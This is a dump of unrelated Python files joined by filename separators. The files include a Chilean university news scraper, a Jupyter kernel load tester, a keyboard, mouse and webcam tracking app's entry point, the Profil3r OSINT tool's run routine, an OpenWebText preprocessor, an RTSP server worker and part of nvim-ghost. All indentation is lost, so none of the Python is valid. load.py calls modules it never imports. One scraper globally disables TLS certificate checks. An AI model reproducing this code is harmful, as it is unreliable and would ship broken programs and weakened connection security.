bs = BeautifulSoup(contents, "html.parser")
items = bs.find_all("article", {"class": "hentry-news"})
items = list(set(items)) # Elimina elementos duplicados
for item in items:
try:
link = item.header.h2.a['href']
titulo = item.header.h2.a.text
fecha = item.header.p.time['datetime']
fecha = formatear_fecha(fecha, 'ucsc')
noticia = urllib.request.urlopen(link).read()
bs_noticia = BeautifulSoup(noticia, "html.parser")
bajada = bs_noticia.find("div", {"class": "entry-summary"}).p.text
try:
imagen = bs_noticia.find("article", {"class": "hentry hentry-news"}).header.span.img['src']
except Exception as e:
imagen = ''
categoria_busqueda = bs_noticia.find("a", {"rel": "category tag"})
categoria_busqueda = setCategoria(categoria_busqueda.text)
saveNew({'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
except Exception as e:
result.append({'status':"error", 'error_message':e, 'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
logging.debug('Deteniendo')
# Universidad del Bío-Bío
def ubiobio():
logging.debug('Lanzado')
universidad = Universidad.objects.get(alias='UBIOBIO')
d = feedparser.parse("http://noticias.ubiobio.cl/feed/")
for e in d.entries:
try:
titulo = (e.title)
link = (e.link)
categoria_busqueda = setCategoria(e.category)
bajada = (e.description).replace("[…]", "")
bs_bajada = BeautifulSoup(bajada, "html.parser")
bajada = bs_bajada.find("p").text
fecha = e.published
fecha = formatear_fecha(fecha,'ubiobio')
cuerpo = e['content']
contenido = cuerpo[0].value
imagen = re.search('(?P<url>https?://[^\s]+(png|jpeg|jpg))', contenido).group("url")
saveNew({'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
except Exception as e:
result.append({'status':"error", 'error_message':e, 'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
logging.debug('Deteniendo')
# Universidad Arturo Prat
def unap():
logging.debug('Lanzado')
universidad = Universidad.objects.get(alias='UNAP')
url_base = 'https://www.unap.cl'
urls_news = {
'investigacion': 'https://www.unap.cl/prontus_unap/site/tax/port/all/taxport_13_48__1.html',
'vinculacion': 'https://www.unap.cl/prontus_unap/site/tax/port/all/taxport_38_39__1.html',
'acreditacion': 'https://www.unap.cl/prontus_unap/site/tax/port/all/taxport_83_113__1.html',
'casa-central': 'https://www.unap.cl/prontus_unap/site/tax/port/all/taxport_5_15__1.html',
'sede-victoria': 'https://www.unap.cl/prontus_unap/site/tax/port/all/taxport_5_17__1.html',
'noticias-arica': 'https://www.unap.cl/prontus_unap/site/tax/port/all/taxport_5_12__1.html',
'noticias-antofagasta': 'https://www.unap.cl/prontus_unap/site/tax/port/all/taxport_5_14__1.html',
'noticias-santiago': 'https://www.unap.cl/prontus_unap/site/tax/port/all/taxport_5_16__1.html'
}
for cat, url in urls_news.items():
contents = urllib.request.urlopen(url).read()
bs = BeautifulSoup(contents, "html.parser")
items = bs.find_all("div", {"class": "taxport-item"})
items = list(set(items)) # Elimina elementos duplicados
for item in items:
try:
link = url_base + item.find("div", {"class": "titular"}).a['href'].strip()
titulo = item.find("div", {"class": "titular"}).a.text.strip()
fecha = item.find("div", {"class": "fecha"}).text.strip()
fecha = formatear_fecha(fecha, 'unap')
noticia = urllib.request.urlopen(link).read()
bs_noticia = BeautifulSoup(noticia, "html.parser")
try:
bajada = bs_noticia.find(id='content').find('h2', {'class': 'bajada'}).text.strip()
except Exception:
bajada = bs_noticia.find("div", {"class": "CUERPO"}).find_all('p')
for b in bajada:
b = b.text.strip()
if b: # Si la bajada no está vacia devuelvela y termina de buscar
bajada = b
break
try:
imagen = url_base + bs_noticia.find("div", {"class": "CUERPO"}).find("img")['src'].strip()
except Exception:
imagen = ''
categoria_busqueda = setCategoria(cat)
saveNew({'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
except Exception as e:
result.append({'status':"error", 'error_message':e, 'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
logging.debug('Deteniendo')
# Universidad de Antofagasta
def ua():
logging.debug('Lanzado')
universidad = Universidad.objects.get(alias='UA')
url_rss = "http://www.comunicacionesua.cl/feed/"
feed = feedparser.parse( url_rss )
for item in feed['items']:
try:
titulo = item['title']
bajada = item['description']
link = item['link']
fecha = item['published']
fecha = formatear_fecha(fecha, "ua")
categoria_busqueda = setCategoria(item['category'])
noticia = urllib.request.urlopen(link).read()
imagen = BeautifulSoup(noticia, "html.parser").find('div', {'class': 'qode-post-image'}).img['src']
saveNew({'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
except Exception as e:
result.append({'status':"error", 'error_message':e, 'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
logging.debug('Deteniendo')
# Universidad de Atacama
def uda():
logging.debug('Lanzado')
universidad = Universidad.objects.get(alias='UDA')
url_rss = "http://www.uda.cl/index.php?option=com_content&view=category&layout=blog&id=15&Itemid=253&format=feed&type=atom"
feed = feedparser.parse( url_rss )
for item in feed['items']:
try:
titulo = item['title']
bajada = BeautifulSoup(item['summary'], "html.parser").find('p').text
link = item['link']
fecha = item['published']
fecha = formatear_fecha(fecha, "uda")
categoria_busqueda = setCategoria(item['category'])
imagen = "http://www.uda.cl/" + BeautifulSoup(item['summary'], "html.parser").find('img')['src']
saveNew({'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
except Exception as e:
result.append({'status':"error", 'error_message':e, 'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
logging.debug('Deteniendo')
# Universidad de La Serena
# Región de Coquimbo
def userena():
logging.debug('Lanzado')
universidad = Universidad.objects.get(alias='USERENA')
url_rss = ['http://www.userena.cl/actualidad-uls.feed?type=rss',
'http://www.userena.cl/cultura-y-extension.feed?type=rss',
'http://www.userena.cl/dgae.feed?type=rss']
feeds = []
for url in url_rss:
feeds.append(feedparser.parse( url ))
for feed in feeds:
for item in feed['items']:
try:
titulo = item['title']
bajada = BeautifulSoup(item['summary'], "html.parser").find_all('p')[2].text
link = item['link']
fecha = item['published']
fecha = formatear_fecha(fecha, "userena")
categoria_busqueda = setCategoria(item['category'])
imagen = BeautifulSoup(item['summary'], "html.parser").p.img['src']
saveNew({'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
except Exception as e:
result.append({'status':"error", 'error_message':e, 'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
logging.debug('Deteniendo')
# Universidad de O'Higgins
def uoh():
# https://www.uoh.cl/
logging.debug('Lanzado')
universidad = Universidad.objects.get(alias='UOH')
url = 'https://www.uoh.cl/#noticias-y-eventos'
# universidad = Universidad.objects.get(alias='UOH')
# contents = urllib.request.urlopen("https://www.uoh.cl/#noticias-y-eventos").read()
logging.debug('Deteniendo')
# Universidad Católica del Maule
def ucm():
# http://portal.ucm.cl/
logging.debug('Lanzado')
universidad = Universidad.objects.get(alias='UCM')
url_rss = "https://portal.ucm.cl/feed" # URL de feed RSS
feed = feedparser.parse( url_rss ) # Se obtiene el XML y se procesa
for item in feed['items']:
try:
titulo = item['title']
link = item['link']
fecha = item['published']
fecha = formatear_fecha(fecha, "ucm")
categoria_busqueda = setCategoria(item['category'])
noticia = urllib.request.urlopen(link).read()
imagen = BeautifulSoup(noticia, "html.parser").find('div', {'class': 'section-content-image'}).img['src']
bajada = BeautifulSoup(noticia, "html.parser").find('div', {'class': 'section-content-paragraph'}).find_all('p')[1].text
saveNew({'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
except Exception as e:
result.append({'status':"error", 'error_message':e, 'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
logging.debug('Deteniendo')
# Universidad de la Frontera
def ufro():
logging.debug('Lanzado')
universidad = Universidad.objects.get(alias='UFRO')
url_rss = 'https://www.ufro.cl/index.php/noticias/12-destacadas?format=feed&type=rss'
feed = feedparser.parse( url_rss )
for item in feed['items']:
try:
titulo = item['title']
link = item['link']
fecha = item['published']
fecha = formatear_fecha(fecha, "ufro")
categoria_busqueda = setCategoria(item['category'])
noticia = urllib.request.urlopen(link).read()
imagen = 'https://www.ufro.cl' + BeautifulSoup(noticia, "html.parser").find('td', {'id': 'imagen'}).p.img['src']
bajada = BeautifulSoup(noticia, "html.parser").find('p', {'class': 'bajada'}).text.strip()
if not bajada:
bajada = BeautifulSoup(noticia, "html.parser").find('table', {'class': 'tnoticia'}).tbody.tr.find_all('td')[1].p.text.strip()
saveNew({'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
except Exception as e:
result.append({'status':"error", 'error_message':e, 'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
logging.debug('Deteniendo')
# https://www.ufro.cl/
# Universidad Católica de Temuco
def uct():
logging.debug('Lanzado')
universidad = Universidad.objects.get(alias='UCT')
url_base = 'https://www.uct.cl/actualidad/'
contents = urllib.request.urlopen(url_base).read()
bs = BeautifulSoup(contents, "html.parser")
items = bs.find('div', {'id': 'cardslist'}).find('cards-container')[':cards'].strip()
data = json.loads(items)
for item in data:
try:
titulo = item['title'].replace('“','"').replace('”','"').strip()
link = item['button']['link']
fecha = item['date']
fecha = formatear_fecha(fecha, "uct")
categoria_busqueda = setCategoria(item['cat'])
noticia = urllib.request.urlopen(link).read()
noticia_bs = BeautifulSoup(noticia, "html.parser")
try:
imagen = item['image']['src']
if imagen is None:
imagen = noticia_bs.find('div', {'class': 'wysiwyg'}).find('img')['src']
except Exception as e:
imagen = ''
bajada = noticia_bs.find('div', {'class': 'wysiwyg'}).find('p').text.replace('“','"').replace('”','"').strip()
saveNew({'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
except Exception as e:
result.append({'status':"error", 'error_message':e, 'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
logging.debug('Deteniendo')
# https://www.uct.cl/
# Universidad Austral de Chile
def uach():
logging.debug('Lanzado')
universidad = Universidad.objects.get(alias='UACH')
url_rss = 'https://diario.uach.cl/feed/'
if hasattr(ssl, '_create_unverified_context'):
ssl._create_default_https_context = ssl._create_unverified_context
feed = feedparser.parse( url_rss )
for item in feed['items']:
try:
titulo = item['title']
link = item['link']
fecha = item['published']
fecha = formatear_fecha(fecha, "uach")
categoria_busqueda = setCategoria(item['category'])
noticia = urllib.request.urlopen(link).read()
noticia_bs = BeautifulSoup(noticia, "html.parser")
imagen = noticia_bs.find('article', {'class': 'post'}).find('div', {'class': 'post-image'}).a['href'].strip()
bajada = noticia_bs.find('p', {'class': 'bajada'}).text.replace('“','"').replace('”','"').strip()
saveNew({'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
except Exception as e:
result.append({'status':"error", 'error_message':e, 'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
logging.debug('Deteniendo')
# https://www.uach.cl/
# Universidad de Aysén
def uaysen():
logging.debug('Lanzado')
universidad = Universidad.objects.get(alias='UAYSEN')
url = 'https://uaysen.cl/actualidad/noticias'
contents = urllib.request.urlopen(url).read()
bs = BeautifulSoup(contents, "html.parser")
items = bs.find_all("div", {"class": "mb-4 col-xl-4 col-lg-4 col-md-6 col-sm-12"})
for item in items:
try:
titulo = item.div.a.text.strip()
link = item.div.find("a")['href']
fecha = item.find("small", {"class": "date"}).text.strip()
fecha = formatear_fecha(fecha, "uaysen")
categoria_busqueda = setCategoria(item.find("ul", {"class": "list-inline"}).li.a.text.strip())
imagen = item.find("div", {"class": "image-news-container-small"}).img['src']
noticia = urllib.request.urlopen(link).read()
noticia_bs = BeautifulSoup(noticia, "html.parser")
bajada = noticia_bs.find("div", {"class": "text-justify font-weight-bold mb-3"}).text.strip()
saveNew({'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
except Exception as e:
result.append({'status':"error", 'error_message':e, 'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
logging.debug('Deteniendo')
# https://uaysen.cl/
pass
# Universidad de Magallanes
def umag():
logging.debug('Lanzado')
universidad = Universidad.objects.get(alias='UMAG')
url = 'http://www.umag.cl/vcm/?page_id=459'
contents = urllib.request.urlopen(url).read()
bs = BeautifulSoup(contents, "html.parser")
items = bs.find_all("div", {"class": "not-col11"})
for item in items:
try:
link = item.find('a', {'class': 'link'})['href']
noticia = urllib.request.urlopen(link).read()
bs_noticia = BeautifulSoup(noticia, "html.parser")
titulo = bs_noticia.find('div', {'class': 'post-title'}).h2.a.text.strip()
fecha = bs_noticia.find('span', {'class': 'post-dates'}).text.strip()
fecha = formatear_fecha(fecha, "umag")
categoria_busqueda = setCategoria('')
try:
imagen = bs_noticia.find('div', {'class': 'entry'}).find('a').find('img')['src']
except:
imagen = ''
bajada = bs_noticia.find('div', {'class': 'entry'}).p.text.strip()
if not bajada:
bajada = bs_noticia.find('div', {'class': 'entry'}).find_all('p')[2].text.strip()
saveNew({'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
except Exception as e:
result.append({'status':"error", 'error_message':e, 'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
logging.debug('Deteniendo')
# http://www.umag.cl/
# Universidad de Tarapacá
def uta():
logging.debug('Lanzado')
universidad = Universidad.objects.get(alias='UTA')
url_rss = 'https://www.uta.cl/index.php/feed/'
feed = feedparser.parse( url_rss )
for item in feed['items']:
try:
titulo = item['title']
link = item['link']
fecha = item['published']
fecha = formatear_fecha(fecha, "uta")
try:
categoria_busqueda = setCategoria(item['category'])
except:
categoria_busqueda = setCategoria()
bajada = item['summary'].strip()
noticia = urllib.request.urlopen(link).read()
try:
imagen = BeautifulSoup(noticia, "html.parser").find('div', {'class': 'wp-block-image'}).figure.a.img['src']
except:
try:
imagen = BeautifulSoup(noticia, "html.parser").find('figure', {'class': 'wp-block-image'}).a.img['src']
except:
imagen = ''
saveNew({'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
except Exception as e:
result.append({'status':"error", 'error_message':e, 'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
logging.debug('Deteniendo')
# https://www.uta.cl/
|
load.py
|
import threading
import datetime
kid = []
n = 10
delay_s = 10
launcher = KernelLauncher('lresende-elyra:8888')
def start_kernel():
try:
id = launcher.launch('spark_python_yarn_cluster')
print('Kernel {} started'.format(id))
kid.append(id)
except RuntimeError as re:
print('Failed to start kernel {}'.format(id, re))
print('')
def stop_kernel(id):
try:
print('Stopping kernel {}'.format(id))
launcher.shutdown(id)
except RuntimeError as re:
print('Failed to stop kernel {}'.format(id, re))
print('')
def log_with_time(message):
time = datetime.datetime.now().strftime("[%d-%m-%Y %I:%M:%S.%f %p]")
print("{} {}".format(time, message))
threads = []
log_with_time("Starting")
while True:
threads.clear()
kid.clear()
for i in range(0,n):
t = threading.Thread(target=start_kernel)
threads.append(t)
for t in threads:
t.start()
for t in threads:
t.join()
threads.clear()
print()
log_with_time("All kernels started...")
print()
time.sleep(delay_s)
requests.get('http://lresende-elyra:8888/api/kernels')
log_with_time("Starting kernel shutdown...")
print()
for i in range(0,n):
t = threading.Thread(target=stop_kernel, args=(kid[i],))
threads.append(t)
for t in threads:
t.start()
for t in threads:
t.join()
print()
log_with_time("All kernels stopped...")
print()
time.sleep(delay_s)
log_with_time("ending")
exit(0)
for i in range(0,n):
print('Starting kernel {}'.format(i))
try:
id = launcher.launch('spark_python_yarn_cluster')
kid.append(id)
print('Kernel {} started'.format(kid[i]))
except:
print('Failed to start kernel {}'.format(i))
print('')
time.sleep(30)
for i in range(0,n):
print('Stopping kernel {}'.format(i))
try:
launcher.shutdown(kid[i])
print('Kernel {} stopped'.format(kid[i]))
except:
print('Failed to stop kernel {}'.format(i))
print('')
|
main.py
|
#!/usr/bin/sudo python3
import threading
from db.processed_signals_db import *
from db.signals_db import *
from db.timer import Timer
from db.video_data_db import *
from device_tracking.mouse_tracker import MouseTracker
from device_tracking.keyboard_tracker import KeyboardTracker
from device_tracking.pythonic_video_tracker import PythonicVideoTracker
from models.DNN_model import DNNModel
from models.Keras_pb_model import KerasPBModel
from GUI.WebUI import WebWindow
import os
# for Linux (maybe even MacOS):
# sudo pyinstaller main.py --noconsole --onefile --add-data GUI:GUI --hidden-import="pynput" --exclude-module tensorflow
# for windows:
# pyinstaller main.py --noconsole --onefile --add-data "GUI;GUI" --exclude-module tensorflow
DEBUG = True
USE_GUI = not True
if __name__ == "__main__":
if not os.path.exists("db"):
os.mkdir("db")
if not os.path.exists('db/signals.sqlite'):
prepare_signal_db()
prepare_imageDB()
prepare_processed_signalDB()
kb_tracker = KeyboardTracker(DEBUG)
kb_tracker.track()
mouse_tracker = MouseTracker(DEBUG)
mouse_tracker.track()
timer = threading.Thread(target=Timer.start_timer, daemon=True)
timer.start()
# Video tracker
video_tracker = PythonicVideoTracker(
source=0,
debug=DEBUG,
models=[DNNModel(DEBUG), KerasPBModel(DEBUG)]
)
w = WebWindow(
video_tracker=video_tracker,
mouse_tracker=mouse_tracker,
kb_tracker=kb_tracker
)
w.create_window()
|
_run.py
|
from profil3r.app.core.colors import Colors
import threading
def run(self):
self.load_config()
self.print_logo()
# Get arguments from the command line
self.parse_arguments()
self.menu()
self.get_permutations()
# Number of permutations to test per service
print(Colors.BOLD + "[+]" + Colors.ENDC + " {} permutations to test for each service, you can reduce this number by selecting less options if it takes too long".format(len(self.permutations_list)))
modules = self.get_report_modules()
print("\n" + "Profil3r will search : \n " + Colors.BOLD + "[+] " + Colors.ENDC + "{} \n".format(str('\n ' + Colors.BOLD + "[+] " + Colors.ENDC).join(modules)))
for module in modules:
thread = threading.Thread(target=self.modules[module]["method"])
thread.start()
thread.join()
if self.report_path:
self.generate_report()
|
build_openwebtext_pretraining_dataset.py
|
# coding=utf-8
"""Preprocessess the Open WebText corpus for pre-training."""
import argparse
import multiprocessing
import os
import random
import tarfile
import time
import tensorflow.compat.v1 as tf
import build_pretraining_dataset
from util import utils
def write_examples(job_id, args):
"""A single process creating and writing out pre-processed examples."""
job_tmp_dir = os.path.join(args.data_dir, "tmp", "job_" + str(job_id))
owt_dir = os.path.join(args.data_dir, "openwebtext")
def log(*args):
msg = " ".join(map(str, args))
print("Job {}:".format(job_id), msg)
log("Creating example writer")
example_writer = build_pretraining_dataset.ExampleWriter(
job_id=job_id,
vocab_file=os.path.join(args.data_dir, "vocab.txt"),
output_dir=os.path.join(args.data_dir, "pretrain_tfrecords"),
max_seq_length=args.max_seq_length,
num_jobs=args.num_processes,
blanks_separate_docs=False,
strip_accents=args.strip_accents,
)
log("Writing tf examples")
fnames = sorted(tf.io.gfile.listdir(owt_dir))
fnames = [f for (i, f) in enumerate(fnames)
if i % args.num_processes == job_id]
random.shuffle(fnames)
start_time = time.time()
for file_no, fname in enumerate(fnames):
if file_no > 0 and file_no % 10 == 0:
elapsed = time.time() - start_time
log("processed {:}/{:} files ({:.1f}%), ELAPSED: {:}s, ETA: {:}s, "
"{:} examples written".format(
file_no, len(fnames), 100.0 * file_no / len(fnames), int(elapsed),
int((len(fnames) - file_no) / (file_no / elapsed)),
example_writer.n_written))
utils.rmkdir(job_tmp_dir)
with tarfile.open(os.path.join(owt_dir, fname)) as f:
f.extractall(job_tmp_dir)
extracted_files = tf.io.gfile.listdir(job_tmp_dir)
random.shuffle(extracted_files)
for txt_fname in extracted_files:
example_writer.write_examples(os.path.join(job_tmp_dir, txt_fname))
example_writer.finish()
log("Done!")
def main():
parser = argparse.ArgumentParser(description=__doc__)
parser.add_argument("--data-dir", required=True,
help="Location of data (vocab file, corpus, etc).")
parser.add_argument("--max-seq-length", default=128, type=int,
help="Number of tokens per example.")
parser.add_argument("--num-processes", default=1, type=int,
help="Parallelize across multiple processes.")
# toggle strip-accents and set default to True which is the default behavior
parser.add_argument("--do-strip-accents", dest='strip_accents',
action='store_true', help="Strip accents (default).")
parser.add_argument("--no-strip-accents", dest='strip_accents',
action='store_false', help="Don't strip accents.")
parser.set_defaults(strip_accents=True)
args = parser.parse_args()
utils.rmkdir(os.path.join(args.data_dir, "pretrain_tfrecords"))
if args.num_processes == 1:
write_examples(0, args)
else:
jobs = []
for i in range(args.num_processes):
job = multiprocessing.Process(target=write_examples, args=(i, args))
jobs.append(job)
job.start()
for job in jobs:
job.join()
if __name__ == "__main__":
main()
|
ServerWorker.py
|
from random import randint
import sys, traceback, threading, socket
from VideoStream import VideoStream
from RtpPacket import RtpPacket
class ServerWorker:
SETUP = 'SETUP'
PLAY = 'PLAY'
PAUSE = 'PAUSE'
TEARDOWN = 'TEARDOWN'
INIT = 0
READY = 1
PLAYING = 2
state = INIT
OK_200 = 0
FILE_NOT_FOUND_404 = 1
CON_ERR_500 = 2
clientInfo = {}
def __init__(self, clientInfo):
self.clientInfo = clientInfo
def run(self):
threading.Thread(target=self.recvRtspRequest).start()
def recvRtspRequest(self):
"""Receive RTSP request from the client."""
connSocket = self.clientInfo['rtspSocket'][0]
while True:
data = connSocket.recv(256)
if data:
print("Data received:\n" + data.decode("utf-8"))
self.processRtspRequest(data.decode("utf-8"))
def processRtspRequest(self, data):
"""Process RTSP request sent from the client."""
# Get the request type
request = data.split('\n')
line1 = request[0].split(' ')
requestType = line1[0]
# Get the media file name
filename = line1[1]
# Get the RTSP sequence number
seq = request[1].split(' ')
# Process SETUP request
if requestType == self.SETUP:
if self.state == self.INIT:
# Update state
print("processing SETUP\n")
try:
self.clientInfo['videoStream'] = VideoStream(filename)
self.state = self.READY
except IOError:
self.replyRtsp(self.FILE_NOT_FOUND_404, seq[1])
# Generate a randomized RTSP session ID
self.clientInfo['session'] = randint(100000, 999999)
# Send RTSP reply
self.replyRtsp(self.OK_200, seq[1])
# Get the RTP/UDP port from the last line
self.clientInfo['rtpPort'] = request[2].split(' ')[3]
# Process PLAY request
elif requestType == self.PLAY:
if self.state == self.READY:
print("processing PLAY\n")
self.state = self.PLAYING
# Create a new socket for RTP/UDP
self.clientInfo["rtpSocket"] = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.replyRtsp(self.OK_200, seq[1])
# Create a new thread and start sending RTP packets
self.clientInfo['event'] = threading.Event()
self.clientInfo['worker']= threading.Thread(target=self.sendRtp)
self.clientInfo['worker'].start()
# Process PAUSE request
elif requestType == self.PAUSE:
if self.state == self.PLAYING:
print("processing PAUSE\n")
self.state = self.READY
self.clientInfo['event'].set()
self.replyRtsp(self.OK_200, seq[1])
# Process TEARDOWN request
elif requestType == self.TEARDOWN:
print("processing TEARDOWN\n")
self.clientInfo['event'].set()
self.replyRtsp(self.OK_200, seq[1])
# Close the RTP socket
self.clientInfo['rtpSocket'].close()
def sendRtp(self):
"""Send RTP packets over UDP."""
while True:
self.clientInfo['event'].wait(0.05)
# Stop sending if request is PAUSE or TEARDOWN
if self.clientInfo['event'].isSet():
break
data = self.clientInfo['videoStream'].nextFrame()
if data:
frameNumber = self.clientInfo['videoStream'].frameNbr()
try:
address = self.clientInfo['rtspSocket'][1][0]
port = int(self.clientInfo['rtpPort'])
self.clientInfo['rtpSocket'].sendto(self.makeRtp(data, frameNumber),(address,port))
except:
print("Connection Error")
#print('-'*60)
#traceback.print_exc(file=sys.stdout)
#print('-'*60)
def makeRtp(self, payload, frameNbr):
"""RTP-packetize the video data."""
version = 2
padding = 0
extension = 0
cc = 0
marker = 0
pt = 26 # MJPEG type
seqnum = frameNbr
ssrc = 0
rtpPacket = RtpPacket()
rtpPacket.encode(version, padding, extension, cc, seqnum, marker, pt, ssrc, payload)
return rtpPacket.getPacket()
def replyRtsp(self, code, seq):
"""Send RTSP reply to the client."""
if code == self.OK_200:
#print("200 OK")
reply = 'RTSP/1.0 200 OK\nCSeq: ' + seq + '\nSession: ' + str(self.clientInfo['session'])
connSocket = self.clientInfo['rtspSocket'][0]
connSocket.send(reply.encode())
# Error messages
elif code == self.FILE_NOT_FOUND_404:
print("404 NOT FOUND")
elif code == self.CON_ERR_500:
print("500 CONNECTION ERROR")
|
binary.py
|
import json
import os
import random
import signal
import socket
import sys
import tempfile
import threading
import time
import urllib.parse
from http.server import BaseHTTPRequestHandler
from http.server import HTTPServer
from typing import Dict
from typing import List
from typing import Optional
import pynvim
import requests
from simple_websocket_server import WebSocket
from simple_websocket_server import WebSocketServer
BUILD_VERSION: str = "v0.1.1"
# TEMP_FILEPATH is used to store the port of the currently running server
TEMP_FILEPATH: str = os.path.join(tempfile.gettempdir(), "nvim-ghost.nvim.port")
WINDOWS: bool = os.name == "nt"
LOCALHOST: str = "127.0.0.1" if WINDOWS else "localhost"
LOGGING_ENABLED: bool = bool(os.environ.get("NVIM_GHOST_LOGGING_ENABLED", False))
SUPER_QUIET: bool = bool(os.environ.get("NVIM_GHOST_SUPER_QUIET", False))
neovim_focused_address: Optional[str] = os.environ.get("NVIM_LISTEN_ADDRESS", None)
_ghost_port: str = os.environ.get("GHOSTTEXT_SERVER_PORT", "4001")
if not _ghost_port.isdigit():
if neovim_focused_address is not None:
with pynvim.attach("socket", path=neovim_focused_address) as nvim_handle:
if not SUPER_QUIET:
nvim_handle.command(
"echom '[nvim-ghost] Invalid port. "
"Please set $GHOSTTEXT_SERVER_PORT to a valid port.'"
)
sys.exit("Port must be a number")
GHOST_PORT: int = int(_ghost_port)
# chdir to folder containing binary
# otherwise the logs are generated whereever the server was started from (i.e curdir)
# which..... isn't good. You'd have stdout.log and stderr.log files everywhere!
os.chdir(os.path.dirname(os.path.abspath(sys.argv[0])))
# we use sys.argv[0] because __file__ doesn't give proper results with pyinstaller
# See: https://stackoverflow.com/a/53511380
def get_neovim_handle() -> pynvim.Nvim:
return pynvim.attach("socket", path=neovim_focused_address)
def _port_occupied(port) -> bool:
"""
If port is occupied, returns True. Else returns False
:param port int: port number to check
"""
port = int(port)
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as socket_checker:
return socket_checker.connect_ex((LOCALHOST, port)) == 0
def _detect_running_port() -> Optional[int]:
"""
Checks whether the server is already running. If yes, returns the port it
is running on.
:rtype Optional[int]: Port number of server (if running), else None
"""
if os.path.exists(TEMP_FILEPATH):
with open(TEMP_FILEPATH) as file:
old_port = file.read()
try:
response = requests.get(f"http://{LOCALHOST}:{old_port}/is_ghost_binary")
if response.ok and response.text == "True":
return int(old_port)
except requests.exceptions.ConnectionError:
return
def _get_running_version(port) -> Optional[str]:
"""
Fetch the version of the currently running server
:param port int: The port number the server is running on
:rtype Optional[str]: Version of the running server
"""
response = requests.get(f"http://{LOCALHOST}:{port}/version")
if response.ok:
return response.text
def store_port():
"""
Store the port number of Server in TEMP_FILEPATH
"""
with open(TEMP_FILEPATH, "w+") as file:
file.write(str(servers.http_server.server_port))
def exit_if_server_already_running():
running_port = _detect_running_port()
if running_port is not None:
if running_port == GHOST_PORT:
if _get_running_version(running_port) == BUILD_VERSION:
print("Server already running")
if neovim_focused_address is not None:
with get_neovim_handle() as handle:
if not SUPER_QUIET:
handle.command("echom '[nvim-ghost] Server running'")
sys.exit()
# Server is outdated. Stop it.
requests.get(f"http://{LOCALHOST}:{running_port}/exit")
# Wait till the server has stopped
while True:
if not _port_occupied(running_port):
break
class ArgParser:
"""
Parser for cli arguments.
"""
def __init__(self):
self.argument_handlers = {
"--enable-logging": self._enable_logging,
"--version": self._version,
"--help": self._help,
}
# GET requests to make to the running server
self.server_requests = []
def parse_args(self, args: List[str] = sys.argv[1:]):
for index, argument in enumerate(args):
if argument in self.argument_handlers:
self.argument_handlers[argument]()
def _version(self):
print(BUILD_VERSION)
sys.exit()
def _help(self):
for item in self.argument_handlers:
print(item)
sys.exit()
def _enable_logging(self):
global LOGGING_ENABLED
LOGGING_ENABLED = True
class GhostHTTPRequestHandler(BaseHTTPRequestHandler):
def do_GET(self):
parsed_url = urllib.parse.urlparse(self.path)
path = parsed_url.path
query = parsed_url.query
responses_nodata = {
